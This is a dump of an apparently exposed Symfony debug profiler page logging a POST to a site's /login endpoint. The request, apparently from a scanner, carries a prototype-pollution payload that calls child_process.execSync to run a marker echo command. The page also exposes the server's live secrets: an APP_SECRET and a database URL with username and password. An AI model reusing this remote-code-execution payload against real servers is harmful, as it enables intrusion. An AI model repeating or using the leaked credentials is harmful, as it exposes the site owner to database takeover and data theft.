https://mobile-spiritentreprises.com/login

WebserviceController :: loginAction

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Request Attributes

Key Value
_controller
"App\Controller\WebserviceController::loginAction"
_firewall_context
"security.firewall.map.context.main"
_format
"json"
_redirected
true
_route
"app_webservice_login"
_route_params
[
  "_format" => "json"
]

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
content-length
"753"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"PHPSESSID=2963cf73ba59e1e15b837a777068d778; sf_redirect=%7B%22token%22%3A%2220f5b4%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22indexAction%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Flmksdmf%5C%2Fwww%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A15%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"mobile-spiritentreprises.com"
next-action
"x"
remote-ip
"16.52.167.124"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-forwarded-for
"16.52.167.124"
x-forwarded-proto
"https"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-ovhrequest-id
"67f69e94291cf9c1a7fa076dd69b4e8c"
x-php-ob-level
"1"
x-predictor
"1"

Request Content

Request content not available (it was retrieved as a resource).

Server Parameters

Key Value
APP_DEBUG
"1"
APP_ENV
"dev"
APP_SECRET
"d3e656107fd14b62ba0547eaf7df1514"
CFG_CLUSTER
"cluster128"
CONTENT_LENGTH
"753"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CORS_ALLOW_ORIGIN
"^https?://localhost(:[0-9]+)?$"
DATABASE_URL
"mysql://lmksdmfspirit:Spiritidf01@lmksdmfspirit.mysql.db:3306/lmksdmfspirit"
DOCUMENT_ROOT
"/home/lmksdmf/www/public"
ENVIRONMENT
"production"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
GEOIP_AREA_CODE
"0"
GEOIP_COUNTRY_CODE
"US"
GEOIP_COUNTRY_NAME
"United States"
GEOIP_DMA_CODE
"0"
GEOIP_LATITUDE
"37.750999"
GEOIP_LONGITUDE
"-97.821999"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_COOKIE
"PHPSESSID=2963cf73ba59e1e15b837a777068d778; sf_redirect=%7B%22token%22%3A%2220f5b4%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22indexAction%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Flmksdmf%5C%2Fwww%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A15%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"mobile-spiritentreprises.com"
HTTP_NEXT_ACTION
"x"
HTTP_REMOTE_IP
"16.52.167.124"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_FORWARDED_FOR
"16.52.167.124"
HTTP_X_FORWARDED_PROTO
"https"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
HTTP_X_OVHREQUEST_ID
"67f69e94291cf9c1a7fa076dd69b4e8c"
HTTP_X_PREDICTOR
"1"
MAILER_URL
"null://localhost"
PHP_SELF
"/index.php"
PHP_VER
"5_3"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REDIRECT_URL
"/login"
REGISTER_GLOBALS
"0"
REMOTE_ADDR
"16.52.167.124"
REMOTE_PORT
"46658"
REQUEST_METHOD
"POST"
REQUEST_TIME
1766064722
REQUEST_TIME_FLOAT
1766064722.3429
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/home/lmksdmf/www/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://mobile-spiritentreprises.com:443/login"
SCRIPT_URL
"/login"
SERVER_ADDR
"10.128.40.1"
SERVER_ADMIN
"postmaster@mobile-spiritentreprises.com"
SERVER_NAME
"mobile-spiritentreprises.com"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,DATABASE_URL,MAILER_URL,CORS_ALLOW_ORIGIN"
UNIQUE_ID
"aUQCUnKTCfiMExlY2F1rugAAA1c"
USER
"lmksdmf"
argc
0
argv
[]

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"application/json"
date
"Thu, 18 Dec 2025 13:32:03 GMT"
x-debug-token
"05244d"

Cookies

Request Cookies

Key Value
PHPSESSID
"2963cf73ba59e1e15b837a777068d778"
sf_redirect
"{"token":"20f5b4","route":"index","method":"GET","controller":{"class":"App\\Controller\\IndexController","method":"indexAction","file":"\/home\/lmksdmf\/www\/src\/Controller\/IndexController.php","line":15},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session

Session Metadata

Key Value
Created
"Thu, 18 Dec 25 14:32:02 +0100"
Last used
"Thu, 18 Dec 25 14:32:02 +0100"
Lifetime
"0"

Session Attributes

Attribute Value
_security.main.target_path
"https://mobile-spiritentreprises.com/"

Flashes

Flashes

No flash messages were created.